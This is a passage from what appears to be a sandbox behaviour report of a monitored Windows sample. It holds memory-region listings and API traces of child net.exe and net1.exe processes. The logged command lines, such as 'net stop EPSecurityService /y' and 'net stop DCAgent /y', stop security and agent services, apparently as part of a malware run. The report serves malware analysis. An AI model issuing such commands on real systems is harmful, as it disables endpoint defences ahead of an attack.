0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5420 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5421 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5422 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5423 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5424 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5425 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5426 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 5427 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5428 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5429 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5430 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5431 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5432 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5433 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5434 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5435 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5436 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5437 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5438 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5439 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5440 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5441 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5442 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5443 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5444 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5445 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5446 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5447 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5448 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5449 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5450 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5451 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5497 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 515 os_tid = 0x127c [0091.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc50 | out: lpSystemTimeAsFileTime=0x16fc50*(dwLowDateTime=0xebcad0b0, dwHighDateTime=0x1d48689)) [0091.635] GetCurrentProcessId () returned 0x1278 [0091.635] GetCurrentThreadId () returned 0x127c [0091.635] GetTickCount () returned 0x20be2 [0091.636] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc58 | out: lpPerformanceCount=0x16fc58*=1813855400000) returned 1 [0091.638] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0091.638] __set_app_type (_Type=0x1) [0091.638] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0091.638] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0091.638] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.638] GetConsoleOutputCP () returned 0x1b5 [0091.639] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0091.639] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.641] sprintf_s (in: _DstBuf=0x16fbf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0091.641] setlocale (category=0, locale=".437") returned="English_United States.437" [0091.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.643] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.643] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DCAgent /y" [0091.643] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f990, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0091.643] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0091.643] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16fbe8 | out: Buffer=0x16fbe8*=0x244d40) returned 0x0 [0091.643] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16fbe8 | out: Buffer=0x16fbe8*=0x24c0e0) returned 0x0 [0091.644] _fileno (_File=0x7fefdba2a80) returned 0 [0091.644] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0091.644] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0091.644] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0091.644] _wcsicmp (_String1="config", _String2="stop") returned -16 [0091.644] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0091.644] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0091.644] _wcsicmp (_String1="file", _String2="stop") returned -13 [0091.644] _wcsicmp (_String1="files", _String2="stop") returned -13 [0091.644] _wcsicmp (_String1="group", _String2="stop") returned -12 [0091.644] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0091.644] _wcsicmp (_String1="help", _String2="stop") returned -11 [0091.644] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0091.645] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0091.645] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0091.645] _wcsicmp (_String1="session", _String2="stop") returned -15 [0091.645] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0091.645] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0091.645] _wcsicmp (_String1="share", _String2="stop") returned -12 [0091.645] _wcsicmp (_String1="start", _String2="stop") returned -14 [0091.645] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0091.645] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0091.645] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.645] _wcsicmp (_String1="accounts", _String2="DCAgent") returned -3 [0091.645] _wcsicmp (_String1="computer", _String2="DCAgent") returned -1 [0091.645] _wcsicmp (_String1="config", _String2="DCAgent") returned -1 [0091.645] _wcsicmp (_String1="continue", _String2="DCAgent") returned -1 [0091.645] _wcsicmp (_String1="cont", _String2="DCAgent") returned -1 [0091.645] _wcsicmp (_String1="file", _String2="DCAgent") returned 2 [0091.645] _wcsicmp (_String1="files", _String2="DCAgent") returned 2 [0091.646] _wcsicmp (_String1="group", _String2="DCAgent") returned 3 [0091.646] _wcsicmp (_String1="groups", _String2="DCAgent") returned 3 [0091.646] _wcsicmp (_String1="help", _String2="DCAgent") returned 4 [0091.646] _wcsicmp (_String1="helpmsg", _String2="DCAgent") returned 4 [0091.646] _wcsicmp (_String1="localgroup", _String2="DCAgent") returned 8 [0091.646] _wcsicmp (_String1="pause", _String2="DCAgent") returned 12 [0091.646] _wcsicmp (_String1="session", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="sessions", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="sess", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="share", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="start", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="stats", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="statistics", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="stop", _String2="DCAgent") returned 15 [0091.646] _wcsicmp (_String1="time", _String2="DCAgent") returned 16 [0091.646] _wcsicmp (_String1="user", _String2="DCAgent") returned 17 [0091.646] _wcsicmp (_String1="users", _String2="DCAgent") returned 17 [0091.646] _wcsicmp (_String1="msg", _String2="DCAgent") returned 9 [0091.647] _wcsicmp (_String1="messenger", _String2="DCAgent") returned 9 [0091.647] _wcsicmp (_String1="receiver", _String2="DCAgent") returned 14 [0091.647] _wcsicmp (_String1="rcv", _String2="DCAgent") returned 14 [0091.647] _wcsicmp (_String1="netpopup", _String2="DCAgent") returned 10 [0091.647] _wcsicmp (_String1="redirector", _String2="DCAgent") returned 14 [0091.647] _wcsicmp (_String1="redir", _String2="DCAgent") returned 14 [0091.647] _wcsicmp (_String1="rdr", _String2="DCAgent") returned 14 [0091.647] _wcsicmp (_String1="workstation", _String2="DCAgent") returned 19 [0091.647] _wcsicmp (_String1="work", _String2="DCAgent") returned 19 [0091.647] _wcsicmp (_String1="wksta", _String2="DCAgent") returned 19 [0091.647] _wcsicmp (_String1="prdr", _String2="DCAgent") returned 12 [0091.647] _wcsicmp (_String1="devrdr", _String2="DCAgent") returned 2 [0091.647] _wcsicmp (_String1="lanmanworkstation", _String2="DCAgent") returned 8 [0091.647] _wcsicmp (_String1="server", _String2="DCAgent") returned 15 [0091.647] _wcsicmp (_String1="svr", _String2="DCAgent") returned 15 [0091.647] _wcsicmp (_String1="srv", _String2="DCAgent") returned 15 [0091.647] _wcsicmp (_String1="lanmanserver", _String2="DCAgent") returned 8 [0091.647] _wcsicmp (_String1="alerter", _String2="DCAgent") returned -3 [0091.647] _wcsicmp (_String1="netlogon", _String2="DCAgent") returned 10 [0091.647] _wcsupr (in: _String="DCAgent" | out: _String="DCAGENT") returned="DCAGENT" [0091.648] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x24cdf0 [0092.103] GetServiceKeyNameW (in: hSCManager=0x24cdf0, lpDisplayName="DCAGENT", lpServiceName=0xff9f5750, lpcchBuffer=0x16fb08 | out: lpServiceName="", lpcchBuffer=0x16fb08) returned 0 [0092.104] _wcsicmp (_String1="msg", _String2="DCAGENT") returned 9 [0092.104] _wcsicmp (_String1="messenger", _String2="DCAGENT") returned 9 [0092.104] _wcsicmp (_String1="receiver", _String2="DCAGENT") returned 14 [0092.104] _wcsicmp (_String1="rcv", _String2="DCAGENT") returned 14 [0092.104] _wcsicmp (_String1="redirector", _String2="DCAGENT") returned 14 [0092.105] _wcsicmp (_String1="redir", _String2="DCAGENT") returned 14 [0092.105] _wcsicmp (_String1="rdr", _String2="DCAGENT") returned 14 [0092.105] _wcsicmp (_String1="workstation", _String2="DCAGENT") returned 19 [0092.105] _wcsicmp (_String1="work", _String2="DCAGENT") returned 19 [0092.105] _wcsicmp (_String1="wksta", _String2="DCAGENT") returned 19 [0092.105] _wcsicmp (_String1="prdr", _String2="DCAGENT") returned 12 [0092.105] _wcsicmp (_String1="devrdr", _String2="DCAGENT") returned 2 [0092.105] _wcsicmp (_String1="lanmanworkstation", _String2="DCAGENT") returned 8 [0092.105] _wcsicmp (_String1="server", _String2="DCAGENT") returned 15 [0092.105] _wcsicmp (_String1="svr", _String2="DCAGENT") returned 15 [0092.105] _wcsicmp (_String1="srv", _String2="DCAGENT") returned 15 [0092.105] _wcsicmp (_String1="lanmanserver", _String2="DCAGENT") returned 8 [0092.105] _wcsicmp (_String1="alerter", _String2="DCAGENT") returned -3 [0092.105] _wcsicmp (_String1="netlogon", _String2="DCAGENT") returned 10 [0092.105] NetServiceControl (in: servername=0x0, service="DCAGENT", opcode=0x0, arg=0x0, bufptr=0x16fb10 | out: bufptr=0x16fb10) returned 0x889 [0092.106] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0092.106] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0092.107] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0092.108] GetFileType (hFile=0xb) returned 0x2 [0092.109] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f9d8 | out: lpMode=0x16f9d8) returned 1 [0092.109] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f9d0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x16f9d0*=0x1e) returned 1 [0092.109] GetFileType (hFile=0xb) returned 0x2 [0092.109] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f9d8 | out: lpMode=0x16f9d8) returned 1 [0092.110] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f9d0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x16f9d0*=0x2) returned 1 [0092.110] _ultow (in: _Dest=0x889, _Radix=1505856 | out: _Dest=0x889) returned="2185" [0092.110] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0092.110] GetFileType (hFile=0xb) returned 0x2 [0092.111] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f9d8 | out: lpMode=0x16f9d8) returned 1 [0092.111] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f9d0, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x16f9d0*=0x34) returned 1 [0092.111] GetFileType (hFile=0xb) returned 0x2 [0092.111] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f9d8 | out: lpMode=0x16f9d8) returned 1 [0092.112] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f9d0, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x16f9d0*=0x2) returned 1 [0092.112] NetApiBufferFree (Buffer=0x244d40) returned 0x0 [0092.112] NetApiBufferFree (Buffer=0x24c0e0) returned 0x0 [0092.112] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DCAgent /y" [0092.112] exit (_Code=2) Process: id = "112" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x626b4000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop EraserSvc11710 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5452 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5453 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5454 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5455 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5456 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5457 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5458 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5459 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5460 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5461 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5462 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5463 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5464 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5465 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5466 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5537 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5538 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5539 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5540 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5541 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 5542 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5543 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5544 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5545 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5546 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5547 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5548 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5549 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5550 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5551 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5552 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5553 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5554 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5555 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5556 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 516 os_tid = 0x1294 Process: id = "113" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x69f31000" os_pid = "0x12a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0x123c" cmd_line = "C:\\Windows\\system32\\net1 stop EPSecurityService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5467 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5468 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5469 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5470 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5471 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5472 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5473 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5474 start_va = 0xff9d0000 end_va = 0xffa02fff entry_point = 0xff9d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5475 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5476 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5477 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5478 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = 